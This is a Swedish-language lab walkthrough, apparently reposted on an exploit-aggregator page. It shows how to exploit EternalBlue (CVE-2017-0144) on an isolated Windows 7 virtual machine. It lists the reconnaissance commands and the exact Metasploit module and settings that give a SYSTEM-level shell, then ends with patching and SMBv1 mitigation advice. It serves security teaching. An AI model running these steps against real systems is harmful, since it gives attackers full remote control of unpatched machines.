Exploit for CVE-2017-0144

Name: Exploit for CVE-2017-0144
Rating: 5 (90 reviews)
2026-04-06 | CVSS 9.3
## https://sploitus.com/exploit?id=2DCED19B-FD53-5198-9DE4-C2936C650E45
# Lab Guide: Exploatering av CVE-2017-0144 (EternalBlue)

Denna guide demonstrerar sårbarheten **CVE-2017-0144**, mer känd som **EternalBlue**. Denna exploit utnyttjar en brist i Microsofts implementering av SMBv1-protokollet och blev världsberömd genom ransomware-attacken **WannaCry**.

> [!WARNING]
> **Ansvarsfriskrivning:** Denna guide är endast för utbildningsändamål i en kontrollerad miljö. Utför aldrig penetrationstester eller exploits på system du inte har uttryckligt skriftligt tillstånd att testa.

---

## 🏗 Labmiljö & Material

För att återskapa sårbarheten på ett säkert sätt används en isolerad miljö i VirtualBox. Detta säkerställer att ingen trafik eller skadlig kod lämnar labbmiljön.

| Komponent | Detaljer | Källa |
| :--- | :--- | :--- |
| **Target** | Windows 7 Ultimate SP1 (x64) | [Archive.org](https://archive.org/details/win-7-ult-sp-1-english-x-64) |
| **Attacker** | Kali Linux (2025.3) | [Kali.org](https://www.kali.org/get-kali/#kali-virtual-machines) |
| **Hypervisor** | Oracle VirtualBox | [VirtualBox.org](https://www.virtualbox.org/wiki/Downloads) |

### Nätverkskonfiguration
Båda maskinerna ställs in på **Host-Only Adapter** för att isolera dem från internet men tillåta kommunikation mellan varandra.
* `Högerklicka på VM -> Settings -> Network -> Adapter 1 -> Attached to: Host-only Adapter`.




---

## 1. Förberedelser (Target & Attacker)

### Konfigurera Windows 7 (Target)
Efter installationen måste Windows-brandväggen inaktiveras för att simulera en sårbar miljö utan externa skyddslager.
1. Gå till `Control Panel` -> `System and Security` -> `Windows Firewall`.
2. Välj `Turn Windows Firewall on or off` och ställ in på **Off**.


  
  
  


### Konfigurera Kali Linux (Attacker)
Logga in med standarduppgifterna `kali` / `kali`. Det är viktigt att tid och tidszon stämmer för korrekt loggning.
1. Öppna **Time and Date Settings**.
2. Lås upp inställningarna och ställ in rätt tidszon (t.ex. Europe/Stockholm).







---

## 2. Informationsinsamling & Scanning

### Identifiera Attacker IP
Kontrollera din egen IP-adress i Kali-terminalen:
`ip a`


Nätverksupptäckt (Reconnaissance)
Vi använder netdiscover för att identifiera målets IP-adress på nätverket:

`sudo netdiscover`


`Scanning med Nmap`
När vi har målets IP (t.ex. 192.168.56.101) kör vi en scanning för att bekräfta operativsystem och öppna portar (speciellt port 445 för SMB):

`sudo nmap -O 192.168.56.101`




3. Exploatering med Metasploit
Nu använder vi Metasploit Framework för att utnyttja sårbarheten.

Starta Metasploit: `msfconsole`

Välj modul: `use exploit/windows/smb/ms17_010_eternalblue`

Sätt mål-IP: `set RHOSTS 192.168.56.101`

Sätt lyssnar-interface: `set LHOST eth0`

Kör exploiten: `run`







4. Post-Exploatering
När vi ser meterpreter > har vi lyckats få en session. Vi kan nu kontrollera våra rättigheter:

`shell`
`whoami`
Resultatet nt authority\system bekräftar att vi har fullständig kontroll över systemet.



Demonstrationsmeddelande
För att visa intrånget visuellt kan vi skicka ett meddelande direkt till offrets skärm:

`msg * "Du har blivit Hackad!"`


🛡 Hur man skyddar sig (Mitigation)
Att förstå hur man åtgärdar sårbarheter är kritiskt för en säkerhetsexpert. För att skydda sig mot EternalBlue bör följande göras:

Installera Säkerhetsuppdateringar: Applicera Microsofts patch MS17-010.

Inaktivera SMBv1: Detta gamla protokoll är osäkert och bör inaktiveras i Windows-inställningarna.

Brandväggskonfiguration: Säkerställ att port 445 inte är öppen mot osäkra nätverk.

Uppgradera Operativsystem: Använd moderna operativsystem (Windows 10/11) som har inbyggda skydd mot minneskorruption.

Tack för att ni läser min guide! Kontakta mig gärna via LinkedIn för frågor eller samarbeten.